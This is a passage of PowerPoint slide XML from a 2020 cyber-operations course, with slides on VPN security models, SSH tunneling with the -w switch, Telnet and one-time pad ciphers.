        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="DFDCB7"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0E42FC-4E2C-4324-A868-2EE1E72D6B75}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2711519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Virtual Private </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Network Security Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1752600"/>
            <a:ext cx="8153400" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Point-to-point connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Tunneling protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ender authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Message integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>IPSec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Layer 2 Tunneling (through an SSL channel)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Transport Layer Security (SSL/TLS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH VPN (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> offers VPN tunneling to secure remote connections)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"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2400" y="1447800"/>
            <a:ext cx="4008293" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0E42FC-4E2C-4324-A868-2EE1E72D6B75}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2571741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382000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Point-to-point connections, tunneling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="7543800" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3 tunnel between two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>best type of tunnel for an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> VPN. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tunnels must be initiated from the client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>side, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“local” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>machine. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are logging in to the server when you create a tunnel, so you need to be root on the server to do this. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command has a switch, -w, which creates a tunnel. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tunnel needs to be given a number, which can be anything not already in use. If you are creating the only tunnel used on either server, you could </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the number 0. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on the client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-w0:0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>root@hserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.                                                                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="788670" lvl="2" indent="-285750">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>switch -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>opens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>tunnel: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>the first 0 is the client tunnel number,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>second 0 is the server tunnel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="788670" lvl="2" indent="-285750">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>are logging in as root on the server. For this to work, you need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>  the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>root password, and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>sshd_conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> file needs to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>PermitRootLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> Yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>.]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2508034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Telnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developed in 1969</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to establish a connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for interactive text-oriented communication to Transmission Control Protocol port 23.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>redates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCP/IP and was originally run over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" u="sng" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(NCP) protocols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By default does not encrypt data, and most implementations have no authentication </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0E42FC-4E2C-4324-A868-2EE1E72D6B75}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158272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One-time pad &amp; stream ciphers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1447800"/>
            <a:ext cx="8229600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="608321"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One-time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="608321"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pad, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="608321"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unconditional secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="608321"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(cannot be cracked)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>equires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the use of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>one-time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>preshared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> secret key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> the same size as, or longer than, the message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(=plaintext) being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>sent. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="548640"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The plaintext and the secret key are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>bitstrings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The secret key is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>bitstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> (referred </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>a one-time pad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CIS4930/CIS5930 Practical Cyber Operstions Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0E42FC-4E2C-4324-A868-2EE1E72D6B75}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229731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lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>One-time pad &amp; stream ciphers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1066800"/>
            <a:ext cx="8153400" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="608321"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Decryption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5860410"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685801" y="2133600"/>
          <a:ext cx="7543799" cy="1463040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1295399"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1219200"/>
                <a:gridCol w="1345131"/>
                <a:gridCol w="1349943"/>
                <a:gridCol w="1191126"/>
              </a:tblGrid>
              <a:tr h="365760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>H</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF6600"/>
                        </a:solidFill>
